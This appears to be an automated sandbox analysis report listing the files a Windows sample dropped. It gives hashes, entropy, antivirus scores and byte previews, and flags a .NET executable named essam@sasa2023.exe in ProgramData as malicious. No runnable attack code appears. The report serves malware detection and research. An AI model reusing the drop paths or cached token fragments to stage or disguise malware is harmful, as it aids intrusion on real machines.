                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):887896
                                                                                                                                                                  Entropy (8bit):7.856084053303004
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:atW4x8xgmUdUcyezFSjahBaNOMGC3UgJuTYdIMlM9QVmcIOLfEdjJYV:B4x8x1UGexmbcMGC3U3MlLVmczEdjJY
                                                                                                                                                                  MD5:61446FDD76788229D3EBAEABE84DF38C
                                                                                                                                                                  SHA1:E15AD80FC74277EF2048312E9A71AF56B2EBA622
                                                                                                                                                                  SHA-256:6AC187B96CE2C03640CFFF2431A36F705C785A42ABA6DD2566F1117652F067CB
                                                                                                                                                                  SHA-512:2C781FF3EEDB81DD9B670D0B50032F3A498D581734F97A3C928D0919ED8AAA12327CE87A8E16F7E11AAD1740A4912109EA4E7B6E9BB39D57A72E165CF561B716
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}...}...}...,...}......}.......}...//..}.../...}.../...}.......}...}...}...,+..}...,/..}...,...}...,...}...,...}..Rich.}..........................PE..L......J.........."..........^...................@..........................@............@...... ..................@.......D........................t..p.......l....................................V..@............................................text.............................. ..`.data....7..........................@....boxld01............................@..@.rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\essam@sasa2023.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\ESjy0irMIn.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):176128
                                                                                                                                                                  Entropy (8bit):6.605034456633344
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:IjeYmvQXWnFgmzbxC+rIIf/bbytAtytAbJrx+okj1K1:IjeYmoXoVCRIOtAQtAtrM1
                                                                                                                                                                  MD5:7266F0DBCD9D7EE7F4618A70D3CB53EE
                                                                                                                                                                  SHA1:1C2EF16D787524C565E7F87A45D881DC5CDB8545
                                                                                                                                                                  SHA-256:09B5AF80660CA11FDB9537DC4D156EFCECF4051B81A573D697984D8075E15BC8
                                                                                                                                                                  SHA-512:5381AF4121D6648F2DDE0DD2036408714D798328C12C4CD5156619A6A9EC6B0C77C4B3899E395DD4D046FB0AA116ED6A56D8F4BFD0E645AA90DDFA161E1A15C6
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....?e............................~.... ... ....@.. ....................................@.................................,...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\essam@sasa2023.exe.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\essam@sasa2023.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):525
                                                                                                                                                                  Entropy (8bit):5.259753436570609
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                                                                                                                                                                  MD5:260E01CC001F9C4643CA7A62F395D747
                                                                                                                                                                  SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                                                                                                                                                                  SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                                                                                                                                                                  SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ESjy0irMIn.exe.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\ESjy0irMIn.exe
                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1742
                                                                                                                                                                  Entropy (8bit):5.38333519179651
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:MxHKQwYHKGSI6o6+vxp3/ell1qHGIs0HKCtHTHhAHKKkBAmHKcA9:iqbYqGSI6o9Zp/ellwmj0qCtzHeqKkBY
                                                                                                                                                                  MD5:0BE948BBCA74F85B3D2B466D6582C6F4
                                                                                                                                                                  SHA1:D6BDEC569DD5C748A94668D77109623322A79B9B
                                                                                                                                                                  SHA-256:A2C775508E39F74CC88A5BC9BE11D42F6A0EED68F7B4271B123F45D9C9E65E51
                                                                                                                                                                  SHA-512:23175FBFA21EFC503BDADE9CC7939EFA1E4377EB1CC572C44B37E3BAF673E29AB8F3BC1EF4A720CC7511C98A85A8034AB94DD143DE69826AB2D114EAC2D7CA30
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):520128
                                                                                                                                                                  Entropy (8bit):4.907706947229227
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:X2ObOSb3F2Fq9VMjNYof+pmpnGDubTxZO7aYb6f5780K2:JbOq3OjNymtGyT
                                                                                                                                                                  MD5:FBD616C03BD0BB44DD43D63001DE4891
                                                                                                                                                                  SHA1:542B34961A09A535B19EBE3B84B41A0A3930F7F0
                                                                                                                                                                  SHA-256:C85795698D46699A69EBC9EAE17AE1C26045C6A97C18B60597679E30C97668B9
                                                                                                                                                                  SHA-512:C92783CFC6CC7CC10A2306FDA2B55E12D572F09E57F1ED656DC959EF79F9862E78011EF5FA771D9828D07CBD82E3FC3ED9B6897A82B36BC26DDF5D88B4D4A9E9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"MajorVersion":4,"MinorVersion":37,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_37.ttf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_37RegularVersion 4.37;O365
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):767532
                                                                                                                                                                  Entropy (8bit):6.5591108505203914
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:on84XUdLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/yLQ/zlm1kjFKy6Nyjbqq+:o8XNDs5+ivOXgm1kYvyz2
                                                                                                                                                                  MD5:795C53DE9F9FEA90A237A43534CCCAB2
                                                                                                                                                                  SHA1:E73FDCD5135A1ED4BEDF643CAB0BD73D58A6F4A6
                                                                                                                                                                  SHA-256:892C40F31DB579FAAE34F53D9482708E5CEE564BEF5413D140D4FCD1B82C2030
                                                                                                                                                                  SHA-512:731988998E96ED7013FBC3B2CA9F7B1D03876F1B68E79C502E983D145A5E8FE58B1FD1780F6455A20EB41E3FC8502E14E021C1E54EFEC503884CBA6227D1B3D4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........... OS/29....(...`cmap.s.(.......pglyf..&?...\....head1..0.......6hheaE.@r.......$hmtxr..........0loca.+.....(...4maxp........... name.V+.........post...<....... ..........*._.<...........<......J.G....Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................l......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word\1380790193167760279.C4

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                  MD5:BB7DF04E1B0A2570657527A7E108AE23
                                                                                                                                                                  SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                                                                                                                                                                  SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                                                                                                                                                                  SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):184
                                                                                                                                                                  Entropy (8bit):5.226620139633058
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Nj5dlv2cv7MCuOt+kiE2J5xAIw3r3P8XlKBuQLlnXdMCuOt+kiE2J5xAIw3r3MGh:N92cvIbOwkn23fM/BukObOwkn23fOes
                                                                                                                                                                  MD5:EBCF2C7074A9B18E02854918B519851F
                                                                                                                                                                  SHA1:FE8F39EF5218D69ED91743DE74ADA2E72BAF8D21
                                                                                                                                                                  SHA-256:BD5B66DD48B5256691A108F1685201C35E43680725B085900E27E9E2E67680E0
                                                                                                                                                                  SHA-512:A6B255D590E73963268D4B56F4B24AC5415164E8584F60825BA16699CA12943117FBDE0AEF53C40351754F22454A9F0AB82F23D1B16157DD0C4007412ACF9D44
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:S..R.......U.A..-L..........*file:///C:\Users\user\AppData\Local\Temp\..BlockersInfo1..rtf......U....5L..........*file:///C:\Users\user\AppData\Local\Temp\..BlockersInfo2..rtf.....

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DC074AFF-2EAD-4843-A23B-E6F591BEDFC1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):162919
                                                                                                                                                                  Entropy (8bit):5.344229935374897
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:Z+C7FPgOGB3U9guw1JQ9DQA+zez0Q5k4F77nXmvid8XRTEwr/j6B:GLQ9DQA+zezQXef
                                                                                                                                                                  MD5:AF54A72AA45899B25403FFE213B26C88
                                                                                                                                                                  SHA1:F84176C0DD169F4125CF32B46ABA378A8151B03C
                                                                                                                                                                  SHA-256:4C388800950B4A5278E05B19F9FC303A23CA96517C937EE6171514DF3E6268A5
                                                                                                                                                                  SHA-512:5EDBB09521C37B26FD21131A47A51930830FDDD8F6960DFEBB052EA75137F1294C8B253736964F6FF522CCEEC8D4613633AFAB58ED22FAF01FB5B577158B91C1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-11-03T17:52:49">.. Build: 16.0.17028.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E07C6528-A839-4E81-93DD-1D531AC22A22

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):162919
                                                                                                                                                                  Entropy (8bit):5.344230639945321
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:j+C7FPgOGB3U9guw1JQ9DQA+zez0Q5k4F77nXmvid8XRTEwr/j6B:QLQ9DQA+zezQXef
                                                                                                                                                                  MD5:13CADA6A7306D5BCF7677854C7833AB6
                                                                                                                                                                  SHA1:CF3E57A3501D060E23287DDC0BB6BAA238AD0B65
                                                                                                                                                                  SHA-256:FAEB3DE9AECD8E64AFE1AF4EC8D946564937BD35F5B04600B905260BC93F7DD2
                                                                                                                                                                  SHA-512:970390D73D977512D84D37339FDB49655B5CD60EB5C8482EC1E737D796CC2B6462B7489165DDBDE24C9553AE37A9C6E50E59C62E8F209C8A4B9E98F8686E75B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-11-03T17:52:47">.. Build: 16.0.17028.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                  Entropy (8bit):0.09216609452072291
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:lSWFN3l/klslpF/4llfll:l9F8E0/
                                                                                                                                                                  MD5:F138A66469C10D5761C6CBB36F2163C3
                                                                                                                                                                  SHA1:EEA136206474280549586923B7A4A3C6D5DB1E25
                                                                                                                                                                  SHA-256:C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
                                                                                                                                                                  SHA-512:9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......................................................................... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db-journal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                  Entropy (8bit):0.13700485453793962
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:7FEG2l+qfls/l/FllkpMRgSWbNFl/sl+ltlslVlllfllqfn:7+/lnflsvg9bNFlEs1EP/6fn
                                                                                                                                                                  MD5:40140C96AB634D228E71BA00622EA7EB
                                                                                                                                                                  SHA1:974C1A2559D22BDCF554672D4C2DB2E3FF6D2408
                                                                                                                                                                  SHA-256:A71B42BD0CE72FBDB61F208ABEFA3A5B9379B19110113897CAC267B74135BFEF
                                                                                                                                                                  SHA-512:E1D9B31B5676EFDA48497AA6217D01603ECB84E2B87BB7A116E838F0E44B1C0C0FA74F6873CF42E5873B00981FF8D6D77D791C57995C24AA03876755A0567376
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.... .c......~......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db-shm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.04467274160378143
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:GolYtjlb0kTDW0ElYtjlb0kTDW0m1R9//Xlvlll1lllwlvlllglbelDbllAlldla:G4SS1SSf9XXPH4l942wU
                                                                                                                                                                  MD5:B668C7BFC0CADCF9323ECED4D056229E
                                                                                                                                                                  SHA1:1895DC5B8382BEEC19FD550C8B6D116BCACE1E39
                                                                                                                                                                  SHA-256:074A82295254CFD7FEB09A5B667E4421AA308CD40F13AC36C8FF3ADF1D642B06
                                                                                                                                                                  SHA-512:56C15ED50169E9B004851A87A1FCA8C2E09577944AF62B16C30CEC4298B9D5F09274780D14C4380CC5194CEBC8E103390A96782A20A1B491FE50F796C189683E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..-.....................p.8...2|....3E..c....s..-.....................p.8...2|....3E..c....s........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):49472
                                                                                                                                                                  Entropy (8bit):0.48337097378035226
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:Ki1Q3zRDFUll7DBtDi4kZERDazqt8VtbDBtDi4kZERDM4lDqt8VtbDBtDi4kZERL:P1Q15Ull7DYMuzO8VFDYMY+DO8VFDYML
                                                                                                                                                                  MD5:A1D92B632C5CBCDB63DCB2736B8FA1A4
                                                                                                                                                                  SHA1:193A051FD134C9A0B5853262CEC97B901816335C
                                                                                                                                                                  SHA-256:1AA63AB53883DD453E016ACDBF6267D1FB4429C4D6FC812F4B5A5B297E2BE847
                                                                                                                                                                  SHA-512:88153B11ADE63AB57C8886BA337DC50AE6E78B0137B9665C6535295B4E3DC251B80A358AF08AF6C33D0D379F7C273CADD383EAD0E836CCAD2809A1A991D72CEF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:7....-..............3E....B...............3E.WpRu...}SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                  Entropy (8bit):3.8233459067051103
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:uiTrlKxsxxUxl9Il8uCVeRyYAwIIeLdfu/d1rc:vIYAeEYFIIeLdfj
                                                                                                                                                                  MD5:8167C6E99EA19C0F0E347DC61FA6FD16
                                                                                                                                                                  SHA1:5C4ABCE5EFA3DDB89FB487BA9D98FBAE7EB39F39
                                                                                                                                                                  SHA-256:BB45A40FE970EC2F9A45413CBB760281C9429E609D8704B48E5E5B5530274E23
                                                                                                                                                                  SHA-512:AED96DB9D8787AA96524140EE4C4B2DE47241ACAF5243E7F2F6CAFA83FACABE4B27328EBFF877AF611AAACD39B6FF5FA0A2F2BDA979EB6C8F00F248CF326001C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.K.m.n.7.4.Y.O.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.7.H.A.b.P.x.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4542
                                                                                                                                                                  Entropy (8bit):3.9973278279221445
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:MYQtfRpgMD6ICtGbMC4MTqMlAGJGf3BNVnd4s:MtVRpgMD6yMCReMlWNVdR
                                                                                                                                                                  MD5:1090E5FDFBF82CA5A8FB267148EDF9CE
                                                                                                                                                                  SHA1:3F736B2659320D995CC5FFADB3B93E2181DD6FA4
                                                                                                                                                                  SHA-256:81F4F74F357028454DA09A1F567A0732007C48327B8D13A638B7B5C63D991952
                                                                                                                                                                  SHA-512:2D6ED0E72479A79447AAF60A6F2E0C50AEA8B12FF3A5279F60A85DC9D55E111EE2208BA734AB8A827CB1AD47C9A7F2292B74F149D790F0ED2C20DF72AC0265DF
                                                                                                                                                                  Malicious:false
